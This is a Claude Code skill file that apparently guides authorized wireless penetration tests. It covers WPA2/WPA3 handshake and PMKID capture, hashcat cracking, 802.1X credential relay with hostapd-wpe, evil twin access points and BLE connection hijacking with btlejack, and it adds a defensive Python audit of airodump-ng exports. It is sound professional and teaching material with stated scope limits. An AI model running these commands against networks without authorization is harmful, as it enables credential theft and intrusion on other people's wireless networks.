pentest-wireless

By fatihkan, updated 6/11/2026

name: pentest-wireless
description: Wireless network pentest — WPA/WPA2/WPA3, evil twin, 802.1X enterprise, Bluetooth advisory. Triggers on wireless pentest, WiFi, WPA2, WPA3, PMKID, evil twin, deauth, Aircrack, hcxdumptool, 802.1X, Bluetooth, BLE security.
license: MIT
compatibility: Works with Claude Code
allowed-tools: Read Write Edit Bash Grep
metadata:
  author: badi
  homepage: https://github.com/fatihkan/badi-skills/tree/main/skills/pentest-wireless
  badi-version: ">=1.24.0"
  category: pentest
  scope: advisory
  inspired-by: 0xSteph/pentest-ai-agents wireless-pentester

pentest-wireless

WiFi + Bluetooth pentest advisory. Active WiFi attacks require physical presence at the engagement site plus spectrum authorization.

Triggers

  • "WiFi pentest"
  • "WPA2 handshake crack"
  • "WPA3 SAE"
  • "evil twin"
  • "deauth attack"
  • "802.1X PEAP"
  • "Bluetooth pentest"
  • "BLE GATT"

Methodology

1. Recon: passive listen with airodump-ng / kismet
2. Target detection: SSID, BSSID, channel, encryption, client count
3. Capture handshake: deauth + capture (WPA2) / PMKID (no client needed)
4. Crack: hashcat / aircrack-ng
5. Post-connection: ARP spoofing + MITM (if available)
6. Enterprise: EAP-PEAP relay (hostapd-wpe)

Target Detection

# QUIET — passive monitor
airodump-ng wlan0mon                          # list all APs
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# QUIET — channel hop monitor
kismet -c wlan0

Handshake Capture Approaches

| Method | Description | OPSEC |
| --- | --- | --- |
| 4-way + deauth | Requires an active client + deauth attack | LOUD |
| PMKID | No client needed (modern AP vulnerability) | QUIET |
| WPS PIN | Brute force on a WPS-enabled AP (Reaver, Bully) | LOUD |
| Evil twin | Own AP, phish the user | LOUD (legal risk) |

# PMKID capture (quietest, no client needed)
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Hashcat crack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule

# 4-way handshake (classic)
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

WPA3 SAE

  • Dragonblood attacks (CVE-2019-9494, CVE-2019-9495): downgrade + side-channel
  • Transition mode (WPA2 + WPA3) — downgrade via WPA2 fallback
  • SAE-PT: pre-shared password table offline (group-specific)

802.1X Enterprise

# EAP relay (hostapd-wpe) — capture user credentials
hostapd-wpe ./hostapd-wpe.conf

# Cred captured -> NTLM hash crack (offline)
hashcat -m 5500 hash.txt wordlist.txt

Mitigation: enforce server certificate validation on client devices (validate the RADIUS server certificate and pin the CA); this should be mandatory during user onboarding.

Evil Twin (Legal Framework Matters)

  • Only within an authorized pentest
  • A hotspot that imitates the AP's SSID
  • The user enters creds -> capture
  • Risk: accidentally phishing an authorized user + GDPR violation

# WiFi-Pumpkin / Pi-Hole AP framework
# Pumpkin -i wlan0 --ssid "Corp-Guest"
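Added example (not part of this skill or its author's code): a Python audit over an airodump-ng CSV export that flags the three conditions the Target Detection, Evil Twin and Recommendation sections deal with: an unknown BSSID broadcasting a managed SSID (evil twin / rogue AP candidate), WPA2/WPA3 transition mode, and PSK on a corporate SSID. The sample rows and the approved-BSSID inventory are constructed, and the column layout assumes airodump-ng's standard AP CSV header.

```python
import csv
import io

# Constructed sample in airodump-ng's AP CSV layout (assumption: column order matches
# real dumps; the station table after the blank line is ignored). DE:AD:BE:EF:00:01 is an
# unknown open AP reusing the managed "CorpWiFi" SSID.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-05-01 09:00:00, 2024-05-01 09:10:00,  6,  54, WPA2, CCMP, PSK, -45, 120, 0,   0.  0.  0.  0,  8, CorpWiFi,
AA:BB:CC:DD:EE:02, 2024-05-01 09:00:00, 2024-05-01 09:10:00, 11, 130, WPA2, CCMP, MGT, -50, 115, 0,   0.  0.  0.  0, 14, CorpEnterprise,
AA:BB:CC:DD:EE:03, 2024-05-01 09:00:00, 2024-05-01 09:10:00,  1, 130, WPA3 WPA2, CCMP, SAE PSK, -52, 110, 0,   0.  0.  0.  0,  8, CorpMain,
DE:AD:BE:EF:00:01, 2024-05-01 09:07:00, 2024-05-01 09:10:00,  6,  54, OPN, , , -30,  30, 0,   0.  0.  0.  0,  8, CorpWiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""
# Constructed asset inventory: which BSSIDs may broadcast each managed SSID.
APPROVED = {
    "CorpWiFi": {"AA:BB:CC:DD:EE:01"},
    "CorpEnterprise": {"AA:BB:CC:DD:EE:02"},
    "CorpMain": {"AA:BB:CC:DD:EE:03"},
}

def parse_access_points(csv_text):
    """Return AP rows as dicts keyed by header name; the AP table ends at the blank
    line that separates it from the station table."""
    ap_block = csv_text.split("\n\n", 1)[0]
    reader = csv.DictReader(io.StringIO(ap_block), skipinitialspace=True)
    return [{k.strip(): (v or "").strip() for k, v in row.items() if k} for row in reader]

def audit(csv_text, approved):
    """Return (essid, bssid, finding) tuples for: evil twin candidates,
    WPA2/WPA3 transition mode, and PSK on a managed SSID."""
    findings = []
    for ap in parse_access_points(csv_text):
        essid, bssid = ap["ESSID"], ap["BSSID"].upper()
        privacy, auth = ap["Privacy"], ap["Authentication"]
        if essid in approved and bssid not in approved[essid]:
            # Unknown radio using a managed SSID: rogue/evil-twin candidate, whatever its encryption
            findings.append((essid, bssid, f"evil twin candidate: BSSID not in inventory (privacy={privacy})"))
            continue
        if "WPA3" in privacy and "WPA2" in privacy:
            findings.append((essid, bssid, "WPA2/WPA3 transition mode: downgrade to WPA2 possible, move to WPA3-only"))
        if essid in approved and auth == "PSK":
            findings.append((essid, bssid, "PSK on managed SSID: migrate to 802.1X EAP-TLS"))
    return findings

if __name__ == "__main__":
    for essid, bssid, finding in audit(SAMPLE_CSV, APPROVED):
        print(f"{essid:15} {bssid}  {finding}")
```

Run it against a real `airodump-ng -w capture` CSV by reading the file into `audit()` with the site's own inventory; a managed SSID seen from an unlisted BSSID is the evil-twin signal the Evil Twin section describes from the attacker's side.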

Bluetooth / BLE

# QUIET — passive scan
hcitool lescan
sudo bluetoothctl
# > scan on

# BLE GATT enumeration
gatttool -b AA:BB:CC:DD:EE:FF -I
# > connect
# > primary
# > characteristics

# BLE replay/MITM (gatttool + spoof)
# btlejack: BLE sniffer + relay
btlejack -s                                   # sniff advertisements
btlejack -c any -j                            # hijack connection (CTF/lab)

Output Template

## Wireless Pentest — <location>

### AP Inventory
- "CorpWiFi" (WPA2-PSK) — handshake captured, crack 3h (weak password)
- "CorpEnterprise" (WPA2-EAP) — captured 12 user creds via PEAP relay
- "CorpGuest" (Open) — captive portal bypass attempt (out-of-scope)

### Findings
- WPA2-PSK password "Spring2024" (3h crack)
- Missing cert validation on client devices -> 802.1X PEAP relay success

### Recommendation
- PSK -> Enterprise EAP-TLS (certificate)
- Cert pinning required on the client side
- WPA3-only mode (turn off transition mode)

Out-of-Scope

  • Unauthorized spectrum / unlicensed radio operation (CFAA + legal risk)
  • DoS via deauth against the other side (legal risk + scope-guard hard refusal)
  • Evil twin at a third-party location